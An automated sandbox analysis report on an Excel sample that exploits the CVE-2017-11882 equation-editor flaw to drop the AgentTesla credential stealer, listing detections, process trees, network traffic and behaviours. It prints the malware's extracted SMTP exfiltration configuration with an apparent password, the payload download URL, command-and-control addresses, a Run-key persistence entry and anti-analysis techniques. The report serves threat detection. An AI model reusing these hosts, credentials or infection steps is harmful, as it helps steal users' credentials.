
Analysis Report 99feb78a_by_Libranalysis

Overview

General Information

Sample Name: 99feb78a_by_Libranalysis (renamed file extension from none to xlsx)
Analysis ID: 412910
MD5: 99feb78ab55c66b871d8998b20528b61
SHA1: 1c96f08e92401f2396ad0b074ca55049a773e4e0
SHA256: 5f4e4fbde7ed003dc34954ee301977f697de1cd2d52beafd898023797ab47255

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2408 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2608 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • joewealth28743.exe (PID: 1980 cmdline: C:\Users\user\AppData\Roaming\joewealth28743.exe MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
  • Nwefile.exe (PID: 2664 cmdline: 'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe' MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
    • Nwefile.exe (PID: 1888 cmdline: {path} MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
  • Nwefile.exe (PID: 2768 cmdline: 'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe' MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
    • Nwefile.exe (PID: 2792 cmdline: {path} MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "sales@orienttech.com.qaOp{^fLb9gN[!mail.orienttech.com.qapdsctsops@gmail.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(28 entries in total; first 5 shown)

Unpacked PEs

Source | Rule | Description | Author
8.2.Nwefile.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
8.2.Nwefile.exe.400000.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
6.2.Nwefile.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
6.2.Nwefile.exe.400000.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
5.2.Nwefile.exe.33d6ac0.4.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(13 entries in total; first 5 shown)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2608, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2608, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Roaming\joewealth28743.exe, CommandLine: C:\Users\user\AppData\Roaming\joewealth28743.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\joewealth28743.exe, NewProcessName: C:\Users\user\AppData\Roaming\joewealth28743.exe, OriginalFileName: C:\Users\user\AppData\Roaming\joewealth28743.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2608, ProcessCommandLine: C:\Users\user\AppData\Roaming\joewealth28743.exe, ProcessId: 1980

Signature Overview


AV Detection:

Found malware configuration
Source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "sales@orienttech.com.qaOp{^fLb9gN[!mail.orienttech.com.qapdsctsops@gmail.com"}
Multi AV Scanner detection for domain / URL
Source: carbinz.gq; Virustotal: Detection: 13%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe; ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe; ReversingLabs: Detection: 48%
Multi AV Scanner detection for submitted file
Source: 99feb78a_by_Libranalysis.xlsx; Virustotal: Detection: 39%
Source: 99feb78a_by_Libranalysis.xlsx; ReversingLabs: Detection: 43%
Machine Learning detection for sample
Source: 99feb78a_by_Libranalysis.xlsx; Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\joewealth28743.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\joewealth28743.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic; DNS query: name: carbinz.gq
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49169 -> 162.241.85.66:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 162.241.85.66:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49171 -> 162.241.85.66:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49172 -> 162.241.85.66:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49174 -> 162.241.85.66:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49175 -> 162.241.85.66:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49176 -> 162.241.85.66:587
Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 162.241.85.66:587
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx; Date: Thu, 13 May 2021 01:22:25 GMT; Content-Type: application/x-msdownload; Content-Length: 758272; Last-Modified: Wed, 12 May 2021 08:04:19 GMT; Connection: keep-alive; ETag: "609b8c03-b9200"; Accept-Ranges: bytes
Source: Joe Sandbox View; IP Address: 162.241.85.66
Source: Joe Sandbox View; IP Address: 185.239.243.112
Source: Joe Sandbox View; ASN Name: OIS1US
Source: Joe Sandbox View; ASN Name: CLOUDIE-AS-APCloudieLimitedHK
Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 162.241.85.66:587
Source: global traffic; HTTP traffic detected: GET /modex/joewealthx.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: carbinz.gq; Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe
Source: global traffic; HTTP traffic detected: GET /modex/joewealthx.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: carbinz.gq; Connection: Keep-Alive
Source: unknown; DNS traffic detected: queries for: carbinz.gq
Source: joewealth28743.exe, 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp; String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp; String found in binary or memory: http://DynDns.comDynDNS
Source: joewealth28743.exe, 00000004.00000002.2353553201.000000000260C000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352689728.0000000002498000.00000004.00000001.sdmp; String found in binary or memory: http://mail.orienttech.com.qa
Source: joewealth28743.exe, 00000004.00000002.2357578553.0000000005BE0000.00000002.00000001.sdmp, Nwefile.exe, 00000006.00000002.2240959548.0000000005E30000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: joewealth28743.exe, 00000004.00000002.2357578553.0000000005BE0000.00000002.00000001.sdmp, Nwefile.exe, 00000006.00000002.2240959548.0000000005E30000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp; String found in binary or memory: http://yyfqMq.com
Source: joewealth28743.exe, 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp; String found in binary or memory: https://YbUuTY812ORW4eX3VhL.com
Source: joewealth28743.exe, 00000004.00000002.2352896428.000000000243A000.00000004.00000001.sdmp; String found in binary or memory: https://api.ipify.org%
Source: Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp; String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: joewealth28743.exe, 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, joewealth28743.exe, 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, Nwefile.exe, 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, Nwefile.exe, 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: joewealth28743.exe, 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe; Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; Window created: window name: CLIPBRDWNDCLASS

System Summary:

.NET source code contains very large array initializations
Source: 4.2.joewealth28743.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6D46FB52u002dC9CBu002d4CF2u002dBDD4u002dC0EDA502A803u007d/EA0D635Du002d0B4Cu002d4E47u002dB864u002dA02C362BD2F0.cs; Large array initialization: .cctor: array initializer size 11955
Source: 6.2.Nwefile.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b6D46FB52u002dC9CBu002d4CF2u002dBDD4u002dC0EDA502A803u007d/EA0D635Du002d0B4Cu002d4E47u002dB864u002dA02C362BD2F0.cs; Large array initialization: .cctor: array initializer size 11955
Source: 8.2.Nwefile.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b6D46FB52u002dC9CBu002d4CF2u002dBDD4u002dC0EDA502A803u007d/EA0D635Du002d0B4Cu002d4E47u002dB864u002dA02C362BD2F0.cs; Large array initialization: .cctor: array initializer size 11955
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Roaming\joewealth28743.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe; Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9F88
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E77E8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E101A
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E587A
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EE8E8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9901
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9910
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002ECD68
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9DA0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9D92
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EB5F5
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E49F0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EB5C0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EAA28
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EB638
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9271
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EC6A8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E86A8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9280
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E8698
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EE328
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9B21
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9B30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E3FA8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EAF98
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EAFC8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_003F0048
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 8_2_001E52B8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 8_2_001E62D0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 8_2_001E5600
                      Source: joewealthx[1].exe.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Nwefile.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 4.2.joewealth28743.exe.400000.0.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (2 occurrences)
                      Source: 6.2.Nwefile.exe.400000.1.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (2 occurrences)
                      Source: 8.2.Nwefile.exe.400000.1.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (2 occurrences)
                      Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@12/4@14/2
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$99feb78a_by_Libranalysis.xlsx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDA67.tmp
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll (4 occurrences)
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor (10 occurrences)
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor (3 occurrences)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
                      Source: 99feb78a_by_Libranalysis.xlsx | Virustotal: Detection: 39%
                      Source: 99feb78a_by_Libranalysis.xlsx | ReversingLabs: Detection: 43%
                      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\joewealth28743.exe C:\Users\user\AppData\Roaming\joewealth28743.exe
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | Process created: C:\Users\user\AppData\Roaming\joewealth28743.exe {path}
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe 'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe'
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe | Process created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path}
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe 'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe'
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe | Process created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path}
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\joewealth28743.exe C:\Users\user\AppData\Roaming\joewealth28743.exe
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | Process created: C:\Users\user\AppData\Roaming\joewealth28743.exe {path}
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe | Process created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path} (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: 99feb78a_by_Libranalysis.xlsx | Initial sample: OLE indicators vbamacros = False

                      Data Obfuscation:

                      .NET source code contains potential unpacker
                      Source: joewealthx[1].exe.1.dr, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.joewealth28743.exe.ef0000.0.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.2.joewealth28743.exe.ef0000.2.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: Nwefile.exe.4.dr, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.2.joewealth28743.exe.ef0000.4.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.joewealth28743.exe.ef0000.0.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.Nwefile.exe.8b0000.0.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.Nwefile.exe.8b0000.1.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 6.2.Nwefile.exe.8b0000.3.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 6.0.Nwefile.exe.8b0000.0.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.2.Nwefile.exe.8b0000.1.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.0.Nwefile.exe.8b0000.0.unpack, MainForm.cs | .Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: joewealthx[1].exe.1.dr | Static PE information: 0xEA4C358C [Sun Jul 25 02:23:08 2094 UTC]
                      Source: initial sample | Static PE information: section name: .text entropy: 7.29768214208 (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\joewealth28743.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Nwefile (2 occurrences)

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File opened: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
